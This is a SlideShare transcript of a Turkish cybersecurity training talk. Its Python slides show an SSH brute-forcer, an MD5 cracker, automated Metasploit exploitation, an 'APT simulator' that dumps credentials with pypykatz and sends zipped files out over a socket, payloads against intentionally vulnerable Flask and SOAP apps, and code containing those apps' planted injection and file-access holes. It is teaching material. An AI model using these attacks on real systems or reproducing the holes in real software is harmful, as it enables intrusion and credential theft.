Ce diaporama a bien été signalé.
Le téléchargement de votre SlideShare est en cours. ×

uygulamalarla siber güvenlik-siber guvenlik haftasi.pptx

Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Prochain SlideShare
OWASP-VulnerableFlaskApp
OWASP-VulnerableFlaskApp
Chargement dans…3
×

Consultez-les par la suite

1 sur 70 Publicité

Plus De Contenu Connexe

Plus récents (20)

Publicité

uygulamalarla siber güvenlik-siber guvenlik haftasi.pptx

  1. 1. Uygulamalarla Siber Güvenlik https://github.com/kaleakademi https://github.com/anil-yelken/cyber-security-tools Anıl Yelken 29.11.2022 Siber Güvenlik Haftası
  2. 2. ENVANTER YÖNETIMI # -*- coding: utf-8 -*- import socket import subprocess banner_liste=[] IP=raw_input("Ip adresini giriniz:") baslangic_port=input("Baslangic port:") bitis_port=input("Bitis port:") for port in range(baslangic_port,bitis_port): try: soket = socket.socket() soket.connect((IP,port)) banner=str(soket.recv(1024)) print "[+]Port:",str(port) print "[+]Banner:",banner banner_liste.append(str(banner)) https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/socketuygulama.py
  3. 3. ENVANTER YÖNETIMI if port == 22: print "Bu sistem linux veya bir ağ cihazı olabilir" dosya= open("linux.txt","r") icerik = dosya.read() dosya.close() if not str(IP) in icerik: dosya = open("linux.txt","a") veri= IP+"n" dosya.write(veri) dosya.close() print "Yeni IP adresi kontrolü" dosya = open("yeni_ip.txt","r") icerik = dosya.read() dosya.close() if not str(IP) in icerik: dosya = open("yeni_ip.txt","a") veri = IP+"n" dosya.write(veri) dosya.close() https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/socketuygulama.py
  4. 4. CEASER ŞIFRELEME def ceasarSifreleme(yazi,otelemeMiktari): sifreyazi = "" yaziListe = [] yaziSayi = [] yaziListe = list(yazi) #print yaziListe for i in yaziListe: yaziSayi = ord(i) + otelemeMiktari sifreyazi = sifreyazi + chr(yaziSayi) return sifreyazi https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/Ceaser.py
  5. 5. CEASER ŞIFRELEME def ceasarSifreCoz(yazi): duzyazi = "" yaziListe = [] yaziSayi = [] yaziListe = list(yazi) #print yaziListe for otelemeMiktari in range(1,29): for i in yaziListe: yaziSayi = ord(i) - otelemeMiktari duzyazi = duzyazi + chr(yaziSayi) print str(otelemeMiktari)+" harf kadar ötelenmiş düz metin : "+ duzyazi duzyazi="" print "----Sezar Şifreleme----" ceasarSifre=ceasarSifreleme("merhaba",3) print "Şifreli metin : "+ceasarSifre print "----Sezar Şifre Çözme----" ceasarSifreCoz(ceasarSifre) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/Ceaser.py
  6. 6. IÇERIK KONTROLÜ # -*- coding: utf-8 -*- import requests import smtplib import time while 1: time.sleep(60) response=requests.get('https://a.wordpress.com') responseIcerik=response.content kontrol = 0 dosya = open('icerik.txt','r') dosyaIcerik=dosya.readlines() dosya.close() for i in dosyaIcerik: if str(i).split("n")[0] in responseIcerik: kontrol = kontrol + 1 https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/icerikKontrol.py
  7. 7. IÇERIK KONTROLÜ if len(dosyaIcerik) == kontrol: print "Web sayfasında değişiklik yok." else: print "Web sayfasında değişiklik yapılmıştır." try: gonderici = 'a@gmail.com' alici = 'a@gmail.com' mesaj = 'Web sayfasının içeriği değişti' username = 'a@gmail.com' password = '*****' server = smtplib.SMTP('smtp.gmail.com:587') server.starttls() server.login(username, password) server.sendmail(gonderici, alici, mesaj) server.quit() print "Mail gönderildi" except: print "Mail gönderilemedi" https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/icerikKontrol.py
  8. 8. HASH KONTROLÜ import itertools import hashlib karakterSeti='abcdefghijklmnoprstuvyz' karakter=raw_input("Max kac karakter olacak: ") md5=raw_input("Md5 giriniz: ") for i in range(1,int(karakter)+1,1): sonuc=itertools.combinations_with_replacement(karakt erSeti,i) for password in sonuc: if md5==hashlib.md5(''.join(password)).hexdigest(): print "Sifre: ",str(''.join(password)) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/md5tanSifreye.py
  9. 9. RAINBOW TABLE OLUSTURUCU import itertools import hashlib sozlukListe=[[],[]] karakterSeti='ab12' karakter=raw_input("Max kac karakter olacak: ") for i in range(1,int(karakter)+1,1): sonuc=itertools.combinations_with_replacement(karakterSeti,i) for password in sonuc: sozlukListe[0].append(''.join(password)) sozlukListe[1].append(hashlib.md5(''.join(password)).hexdigest()) #print hashlib.md5(''.join(password)).hexdigest() print "Sozluk:",sozlukListe[0] print "Hashler:",sozlukListe[1] https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/rainbowOlustur.py
  10. 10. SSH KABA KUVVET SALDIRISI import paramiko client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) Username=["siber","guvenlik"] Password=["siber","guvenlik"] for i in Username: for j in Password: try: sonuc=client.connect('192.168.50.50', username=i, password=j) #print sonuc client.close() print "Username: ",i," Password: ",j except: print "Username: ",i," Password: ",j,"baglanti yapilamadi" https://github.com/anil-yelken/siber-guvenlik-icin-python/blob/main/sshBruteForce.py
  11. 11. SSH KONTROL import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy( paramiko.AutoAddPolicy()) ssh.connect('127.0.0.1', username='kali', password='kali') stdin, stdout, stderr = ssh.exec_command("""grep "sudo" /etc/group|cut -d ":" -f4""") print("Sudo grubundaki kullanıcılar:") print(stdout.read()) https://raw.githubusercontent.com/anil-yelken/siber-guvenlik-icin-python/main/ssh_kontrol.py
  12. 12. OTOMATIK MSFCONSOLE if "vsFTPd 2.3.4" in i: print "[+]Service: ",i print "[+]Metasploit exploit: exploit/unix/ftp/vsftpd_234_backdoor" if automaticExploit == "True": try: rc="""use exploit/unix/ftp/vsftpd_234_backdoor set RHOST rhost set RPORT 21 exploit""" rc=rc.replace("rhost",str(IP)) path=subprocess.check_output("pwd",shell=True).spli tlines()[0] path=path+"/vsFTPd2-3-4.rc" dosya=open(path,"w") dosya.write(rc) dosya.close() komut="xterm -e msfconsole -r "+str(path) subprocess.Popen(komut,shell=True,stdout=subproce ss.PIPE) except: print "Failed to exploit " https://github.com/anil-yelken/automatic-exploit/blob/main/automatic-exploit.py
  13. 13. WEB ZAFIYET TARAMASI def commandInjection(url,dosyaAdi): try: deger = url.find("=") istek = url[:deger + 1] + ";cat%20/etc/passwd" sonuc = requests.get(istek, verify=False) if "www-data" in sonuc.content: print "[+]Command injection possible, payload: ;cat%20/etc/passwd" print "Response: ", sonuc.content rapor = open(dosyaAdi, "a") raporIcerik="[+]Command injection possible, payload: ;cat%20/etc/passwdn" raporIcerik += "Response: " + sonuc.content + "n" rapor.write(raporIcerik) rapor.close() https://github.com/anil-yelken/web-vulnerability-scanner/blob/main/web-vulnerability-scanner.py
  14. 14. NESSUS OTOMASYONU import requests accessKey="8caddd5ad72d86c509982ca2a3229f426883386b0780c114d275fdd8d5829c 97" secretKey="a53754e51fa487075a67832f885a3953cc3854620da3b8212ab3acfcf50901c5 " xapikeys="accessKey="+accessKey+"; secretKey="+secretKey+";" header={"X-ApiKeys":xapikeys} url="https://127.0.0.1:8834/folders" sonuc= requests.get(url=url,headers=header,verify=False) for i in sonuc.json()['folders']: print i['name'] https://raw.githubusercontent.com/kaleakademi/siber-guvenlik-icin-python-egitimi/main/nessus1.py
  15. 15. NESSUS OTOMASYONU url="https://127.0.0.1:8834/scans" sonuc= requests.get(url=url,headers=header,verify=False) for i in sonuc.json()['scans']: #print i if "Host Discovery" in str(i['name']): url="https://127.0.0.1:8834/scans/"+str(i['id']) sonuc= requests.get(url=url,headers=header,verify=False) for j in sonuc.json()['hosts']: dosya_adi=str(i['name'])+"_ipler.txt" veri=str(j['hostname'])+"n" dosya=open(dosya_adi,"a") dosya.write(veri) dosya.close() https://github.com/kaleakademi/siber-guvenlik-icin-python-egitimi/blob/main/nessus2.py
  16. 16. NESSUS OTOMASYONU url="https://127.0.0.1:8834/scans/"+str(i['id'])+"/hosts/"+str(j['host_id']) IP_sonuc= requests.get(url=url,headers=header,verify=False) for k in IP_sonuc.json()['vulnerabilities']: plugin_id=k['plugin_id'] url="https://127.0.0.1:8834/plugins/plugin/"+str(plugin_id) plugin_sonuc= requests.get(url=url,headers=header,verify=False) if str(plugin_sonuc.json()['id']) in "11936": for plugin in plugin_sonuc.json()['attributes']: if "os_identification" in plugin['attribute_name']: print str(j['hostname']) print IP_sonuc.json()['info']['operating-system'] https://github.com/kaleakademi/siber-guvenlik-icin-python-egitimi/blob/main/nessus2.py
  17. 17. NESSUS OTOMASYONU for i in sonuc.json()['scans']: if "Host Discovery" in i['name'] and "completed" in i['status']: url="https://"+IP+":8834/scans/"+str(i['id']) sonuc=requests.get(url=url,headers=header,verify=False) for j in sonuc.json()['hosts']: if not j['hostname'] in iplerListe: conn=sqlite3.connect('hostDiscovery.db') c=conn.cursor() c.execute('INSERT INTO hosts VALUES (?,?)',(str(j['hostname']),str(datetime.datetime.now()))) conn.commit() conn.close() print "New IP:",j['hostname'] s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((SIEMhost,SIEMport)) message="New host:"+j['hostname'] s.sendall(message) s.close() https://github.com/anil-yelken/Nessus-Automation/blob/main/finding-new-ip-nessus.py
  18. 18. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU https://github.com/anil-yelken/cyber-security-control-validation- platform
  19. 19. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: result = sock.connect_ex((vulnerable_ip,8000)) if result == 0: print("Vulnerable SOAP service is running") else: print("Vulnerable SOAP service isn't running") except: pass
  20. 20. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU print("SOAP SQL injection is testing...") try: result=client.service.query("' or '1=1") #print(result) if "test" in result and "erlik" in result: successful_attack+=1 print("Successful attack") else: unsuccessful_attack+=1 print("Unsuccessful attack") except: unsuccessful_attack+=1 print("Unsuccessful attack") pass print("SOAP SQL injection is finished.")
  21. 21. SIBER GÜVENLIK KONTROL DOĞRULAMA PLATFORMU @rpc(String , _returns=String) def query(ctx, name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name ) data=str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="soap_server.log", filemode='w', level=logging.DEBUG) logging.debug(data) return(data)
  22. 22. BAYANAY - PYTHON WARDRIVING ARACI https://github.com/anil-yelken/wardriving
  23. 23. BAYANAY - PYTHON WARDRIVING ARACI from selenium import webdriver import time import datetime driver = webdriver.Firefox() driver.get("https://www.geody.com") driver.find_element_by_id("cookieChoiceDismiss").click() while 1: driver.find_element_by_xpath("/html/body/table[1]/tbody/tr/td[1]/a").click() time.sleep(10) konum=str(driver.current_url).split("&")[1:] print konum log=str(konum[0])+"|"+str(konum[1])+"|"+str(datetime.datetime.now().strftime("%d %B %Y %I:%M%p"))+"n" dosya=open("location.txt","a") dosya.write(log) dosya.close() driver.refresh()
  24. 24. BAYANAY - PYTHON WARDRIVING ARACI from scapy.all import * import datetime ssidListe = [] def SSIDBul(pkt) : if pkt.haslayer(Dot11Beacon) : ssid = str(pkt.info) mac = str(pkt.addr2) if not ssid in ssidListe: ssidListe.append(ssid) print "Mac: ",mac," SSID: ",ssid log=str(datetime.datetime.now().strftime("%d %B %Y %I:%M%p"))+"|"+str(mac)+"|"+str(ssid)+"n" dosya=open("ssid.txt","a") dosya.write(log) dosya.close() sniff(iface="wlan0", prn = SSIDBul)
  25. 25. APT SIMULATOR https://github.com/anil-yelken/APT-Simulator
  26. 26. APT SIMULATOR try: ipconfig=subprocess.check_output("ipconfig /all",shell=True) with open("ipconfig.txt", 'wb') as file: file.write(ipconfig) except: pass try: os.system("pip3 install pypykatz") except: pass try: os.system("pypykatz.py rekall dump -t 0") print("pypykatz is finished.") except: pass
  27. 27. APT SIMULATOR try: file_zip = zipfile.ZipFile('file.zip', 'w') for folder, subfolders, files in os.walk('.'): for file in files: if file.endswith('.txt'): file_zip.write(os.path.join(folder, file), os.path.relpath(os.path.join(folder, file), '.'), compress_type=zipfile.ZIP_DEFLATED) file_zip.close() print("Files are compressed.") s = socket.socket() s.connect(("127.0.0.1", 80)) with open("file.zip", "rb") as f: while True: bytes_read = f.read(4096) if not bytes_read: break s.sendall(bytes_read) s.close() print("Zip file sent.") except: pass
  28. 28. APT SIMULATOR import socket s = socket.socket() s.bind(("0.0.0.0", 80)) s.listen() client_socket, address = s.accept() print(f"[+] {address} is connected.") with open("received_file.zip", "wb") as f: while True: bytes_read = client_socket.recv(4096) if not bytes_read: break f.write(bytes_read) client_socket.close() s.close()
  29. 29. PYWIRT https://github.com/anil-yelken/pywirt
  30. 30. PYWIRT import winrm with open('cred_list.txt') as f: lines = f.readlines() for line in lines: IP_address=line.split("|")[0] user=line.split("|")[1] passw=line.split("|")[2].split("n")[0] print(IP_address,"-",user,"-",passw,"-") winrm_session = winrm.Session(IP_address, auth=(user, passw)) try: print("IP Configuration:") result = winrm_session.run_cmd('ipconfig', ['/all']) for result_line in result.std_out.decode('ascii').split("rn"): print(result_line) except: pass
  31. 31. PYLIRT https://github.com/anil-yelken/pylirt
  32. 32. PYLIRT import paramiko with open('cred_list.txt') as f: lines = f.readlines() for line in lines: IP_address=line.split("|")[0] user=line.split("|")[1] passw=line.split("|")[2].split("n")[0] print(IP_address,"-",user,"-",passw) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(IP_address, username=user, password=passw) try: stdin, stdout, stderr = ssh.exec_command("""cat /etc/passwd""") print("/etc/passwd:n",stdout.read().decode()) except: pass
  33. 33. SOAR https://github.com/anil-yelken/SOAR https://www.mshowto.org/acik-kaynak-soar-cozumleri-bolum-1.html
  34. 34. SOAR def send_mail(from_message,to_message,message,username,password,SMTP_server): try: import smtplib server = smtplib.SMTP(SMTP_server) server.starttls() server.login(username, password) server.sendmail(from_message, to_message, message) server.quit() print("Mail sent successfully") except: print("Mail sent failed")
  35. 35. SOAR def send_message(nexmo_key,nexmo_Secret,from_message,to_message,text): try: import nexmo client = nexmo.Client(key=nexmo_key, secret=nexmo_Secret) response = client.send_message( { "from": from_message, "to": to_message, "text": text, } ) if response["messages"][0]["status"] == "0": print("Message sent successfully") else: print("Message sent failed") except: print("Message sent failed")
  36. 36. SOAR def alienvault_control(OTX_key,find_word): from OTXv2 import OTXv2 otx = OTXv2(OTX_key) for i in (otx.getall()): try: id = str(i['id']) except: id = "" try: name = str(i['name']) except: name = "" try: description = str(i['description']) except: description = ""
  37. 37. SOAR def staxx_ip_control(username,password,staxx_URL): import requests import json header = {'Content-Type': 'application/json'} veri = {"username": username, "password": password} url = staxx_URL + '/api/v1/login' response = requests.post(url=url, headers=header, data=json.dumps(veri), verify=False) token = response.json()['token_id'] data = {"token": str(token), "query": "confidence>70", "type": "json", "size": 10} url = staxx_URL + "/api/v1/intelligence" result = requests.post(url=url, headers=header, data=json.dumps(data), verify=False) return result
  38. 38. OWASP – VULNERABLE FLASK APP -HTML Injection -SSTI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization -Broken Authentication -DOS -File Upload https://github.com/anil-yelken/Vulnerable-Flask-App
  39. 39. OWASP – VULNERABLE FLASK APP SQL INJECTION @app.route("/user/<string:name>") def search_user(name): con = sqlite3.connect("test.db") cur = con.cursor() cur.execute("select * from test where username = '%s'" % name) data = str(cur.fetchall()) con.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200
  40. 40. OWASP – VULNERABLE FLASK APP SQL INJECTION
  41. 41. OWASP – VULNERABLE FLASK APP HTML INJECTION @app.route("/welcome2/<string:name>") def welcome2(name): data="Welcome "+name return data
  42. 42. OWASP – VULNERABLE FLASK APP HTML INJECTION
  43. 43. OWASP – VULNERABLE FLASK APP SSTI @app.route("/hello") def hello_ssti(): if request.args.get('name'): name = request.args.get('name') template = f'''<div> <h1>Hello</h1> {name} </div> ''' import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(template)) return render_template_string(template)
  44. 44. OWASP – VULNERABLE FLASK APP SSTI
  45. 45. OWASP – VULNERABLE FLASK APP COMMAND INJECTION @app.route("/get_users") def get_users(): try: hostname = request.args.get('hostname') command = "dig " + hostname data = subprocess.check_output(command, shell=True) return data except: data = str(hostname) + " username didn't found" return data
  46. 46. OWASP – VULNERABLE FLASK APP COMMAND INJECTION
  47. 47. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_log/") def get_log(): try: command="cat restapi.log" data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="Command didn't run"), 200
  48. 48. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  49. 49. OWASP – VULNERABLE FLASK APP LFI @app.route("/read_file") def read_file(): filename = request.args.get('filename') file = open(filename, "r") data = file.read() file.close() import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(str(data)) return jsonify(data=data),200
  50. 50. OWASP – VULNERABLE FLASK APP LFI
  51. 51. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE @app.route("/get_admin_mail/<string:control>") def get_admin_mail(control): if control=="admin": data="admin@cybersecurity.intra" import logging logging.basicConfig(filename="restapi.log", filemode='w', level=logging.DEBUG) logging.debug(data) return jsonify(data=data),200 else: return jsonify(data="Control didn't set admin"), 200
  52. 52. OWASP – VULNERABLE FLASK APP INFORMATION DISCLOSURE
  53. 53. OWASP – VULNERABLE FLASK APP BRUTE FORCE @app.route('/login',methods=["GET"]) def login(): username=request.args.get("username") passwd=request.args.get("password") if "anil" in username and "cyber" in passwd: return jsonify(data="Login successful"), 200 else: return jsonify(data="Login unsuccessful"), 403
  54. 54. OWASP – VULNERABLE FLASK APP BRUTE FORCE
  55. 55. OWASP – VULNERABLE FLASK APP FILE UPLOAD @app.route('/upload', methods = ['GET','POST']) def uploadfile(): import os if request.method == 'POST': f = request.files['file'] filename=secure_filename(f.filename) f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return 'File uploaded successfully' else: return ''' <html> <body> <form method = "POST" enctype = "multipart/form-data"> <input type = "file" name = "file" /> <input type = "submit"/> </form> </body> </html> '''
  56. 56. OWASP – VULNERABLE FLASK APP FILE UPLOAD
  57. 57. OWASP – VULNERABLE FLASK APP DOS @app.route("/user_pass_control") def user_pass_control(): import re username=request.form.get("username") password=request.form.get("password") if re.search(username,password): return jsonify(data="Password include username"), 200 else: return jsonify(data="Password doesn't include username"), 200
  58. 58. OWASP – VULNERABLE FLASK APP DOS
  59. 59. OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
  60. 60. OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
  61. 61. OWASP – VULNERABLE FLASK APP
  62. 62. VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
  63. 63. VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
  64. 64. VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
  65. 65. VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
  66. 66. VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id n# "
  67. 67. VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
  68. 68. VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
  69. 69. ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
  70. 70. KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken

×